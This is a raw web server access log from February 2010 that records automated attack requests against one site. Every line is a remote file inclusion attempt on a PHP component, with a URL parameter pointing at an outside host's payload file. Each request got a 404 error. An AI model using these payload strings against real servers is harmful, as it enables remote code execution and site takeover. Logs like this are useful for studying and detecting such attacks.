211.239.124.204 - - [25/Feb/2010:04:41:41 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:41:41 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:41:57 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:41:57 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:42:24 -0800] "GET /logs/access_100125.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:04:42:39 -0800] "GET /dbutil.bck.php?confdir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:04:42:39 -0800] "GET /logs//dbutil.bck.php?confdir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:04:42:39 -0800] "GET /logs/access_100125.log%20%20//dbutil.bck.php?confdir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:04:42:40 -0800] "GET /dbutil.bck.php?confdir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:04:42:40 -0800] "GET /logs//dbutil.bck.php?confdir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:04:42:40 -0800] "GET /logs/access_100125.log%20%20//dbutil.bck.php?confdir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:43:02 -0800] "GET /logs/access_100120.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:43:56 -0800] "GET /logs/access_100125.log////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:44:01 -0800] "GET /logs/access_100120.log////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:44:06 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:44:06 -0800] "GET /logs/access_100120.log%20%20//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:44:07 -0800] "GET /delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:44:18 -0800] "GET /delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:44:18 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:44:19 -0800] "GET /logs/access_100120.log%20%20//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:04:44:53 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:04:44:53 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:45:00 -0800] "GET /delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:45:00 -0800] "GET /logs/access_100120.log//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:45:00 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:45:53 -0800] "GET ///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:45:53 -0800] "GET /logs/access_100217.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:45:53 -0800] "GET /logs////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:45:53 -0800] "GET /logs/access_100210.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:46:03 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:46:03 -0800] "GET /delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:46:03 -0800] "GET /logs/access_100120.log//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:47:23 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:47:23 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:47:23 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:47:33 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:48:39 -0800] "GET /logs/access_100119.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:04:50:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:04:50:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:04:50:45 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:50:52 -0800] "GET /logs/access_100215.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:50:52 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:50:52 -0800] "GET /delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:50:58 -0800] "GET /delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:50:58 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:50:58 -0800] "GET /logs/access_100215.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:51:10 -0800] "GET /logs/access_100204.log//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:51:11 -0800] "GET /logs/access_100204.log//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:51:27 -0800] "GET /logs/access_100215.log//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:51:38 -0800] "GET /logs/access_100204.log//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:51:47 -0800] "GET /logs/access_100215.log//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:04:51:50 -0800] "GET /logs/access_100208.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:51:51 -0800] "GET /logs/access_100219.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:51:56 -0800] "GET /logs/access_100219.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:52:01 -0800] "GET /logs/access_100215.log//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:52:13 -0800] "GET /logs/access_100118.log//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:30 -0800] "GET ///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:30 -0800] "GET /logs////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:30 -0800] "GET /logs/access_100217.log%20%20////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:34 -0800] "GET /logs/access_100210.log%20%20////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:44 -0800] "GET ///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:44 -0800] "GET /logs////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:44 -0800] "GET /logs/access_100217.log%20%20////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:04:52:49 -0800] "GET /logs/access_100118.log//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:52:50 -0800] "GET /logs/access_100210.log%20%20////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:53:13 -0800] "GET /logs/access_100118.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:53:14 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:53:14 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:04:53:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:04:53:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:04:53:46 -0800] "GET /logs/access_100208.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:54:26 -0800] "GET /logs/access_100120.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:04:54:50 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:23 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:23 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:23 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:35 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:35 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:35 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:40 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:41 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:46 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:50 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:50 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:50 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:55:57 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:04:55:59 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:04:55:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:04 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:04 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:04 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:07 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:07 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:09 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:09 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:10 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:10 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:10 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:12 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:19 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:22 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:41 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:50 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:56:54 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:57:00 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:57:00 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:57:00 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:58:44 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:04:58:44 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
